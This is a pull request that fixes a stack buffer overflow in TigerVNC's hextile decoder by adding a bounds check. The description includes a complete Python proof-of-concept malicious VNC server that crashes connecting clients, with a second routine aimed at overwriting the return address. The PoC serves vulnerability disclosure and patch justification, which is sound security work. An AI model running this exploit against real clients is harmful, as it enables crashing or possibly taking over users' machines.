### PR TITLE
hextileDecode.h: Fix buffer overflow

### DIFF
--- a/common/rfb/hextileDecode.h
+++ b/common/rfb/hextileDecode.h
@@ -22,6 +22,7 @@
 // BPP                - 8, 16 or 32
 
 #include <rdr/InStream.h>
+#include <rfb/Exception.h>
 #include <rfb/hextileConstants.h>
 
 namespace rfb {
@@ -87,6 +88,9 @@ static void HEXTILE_DECODE (const Rect& r, rdr::InStream* is,
           int y = (xy & 15);
           int w = ((wh >> 4) & 15) + 1;
           int h = (wh & 15) + 1;
+          if (x + w > 16 || y + h > 16) {
+            throw rfb::Exception("HEXTILE_DECODE: Hextile out of bounds");
+          }
           PIXEL_T* ptr = buf + y * t.width() + x;
           int rowAdd = t.width() - w;
           while (h-- > 0) {


### PR DESCRIPTION
The hextileDecodexx functions do not properly check for out-of-bounds pixel buffer writes,
which allows a malicious server to overwrite parts of the stack.

Note that this is quite flexible, so it seems that with correct values, the SSP canary can be jumped over, so this bug could potentially be used for remote code execution.

PoC exploit:
```
#! /usr/bin/env python3

# TigerVNC Hextile stack overflow PoC
# by Josef Gajdusek <atx@atx.name>

import asyncio
import struct

class EvilVNCProtocol(asyncio.Protocol):

    def connection_made(self, transport):
        self.transport = transport
        # Note that we just ignore whatever the client says
        self.transport.write(b"RFB 003.008\n")
        # Send supported security types (1 - None)
        self.transport.write(b"\x01\x01")
        # Confirm that authentication succeeded
        self.transport.write(b"\x00\x00\x00\x00")
        # Send ServerInit
        self.transport.write(
            struct.pack(">HHBBBBHHHBBBBBBIB",
                        100, 100, # Framebuffer width and height
                        32, # Bits per pixel
                        8, # Color depth
                        1, # Big endian
                        1, # True Color
                        255, 255, 255, # Color max values
                        0, 8, 16, # Color shifts
                        0, 0, 0, # Padding
                        1, # Name length
                        ord("E") # Name
            )
        )
        # Send evil FramebufferUpdate
        self.send_crash()
        #self.send_return_overwrite()

    def send_crash(self):
        self.transport.write(
            struct.pack(">BBHHHHHi",
                        0, 0, # message-type and padding
                        1, # number-of-rectangles
                        0, 0, # x and y positions
                        10, 10, # Width and height
                        5, # encoding = hextiles
            )
        )
        self.transport.write(
            struct.pack(">BBIBB",
                        0x18, # tileType = hextileAnySubrects | hextileSubrectsColored
                        0x1, # nSubrects
                        0x12345678, # Pixel value
                        0xff, # x and y
                        0xff, # w and h
            )
        )
        self.transport.write(b"\xff\x00\x00\x00" * 100)

    def send_return_overwrite(self):
        # Note that the values might need some tweaking depending on the
        self.transport.write(
            struct.pack(">BBHHHHHi",
                        0, 0, # message-type and padding
                        1, # number-of-rectangles
                        0, 0, # x and y positions
                        16, 10, # Width and height
                        5, # encoding = hextiles
            )
        )
        self.transport.write(
            struct.pack(">BBIBB",
                        0x18, # tileType = hextileAnySubrects | hextileSubrectsColored
                        0x1, # nSubrects
                        0x41414141, # Pixel value
                        0x6f, # x and y
                        0x0f, # w and h
            )
        )
        self.transport.write(b"\xff\x00\x00\x00" * 100)



    def data_received(self, data):
        pass


loop = asyncio.get_event_loop()
coro = loop.create_server(EvilVNCProtocol, "127.0.0.1", 5900)
server = loop.run_until_complete(coro)

loop.run_forever()
```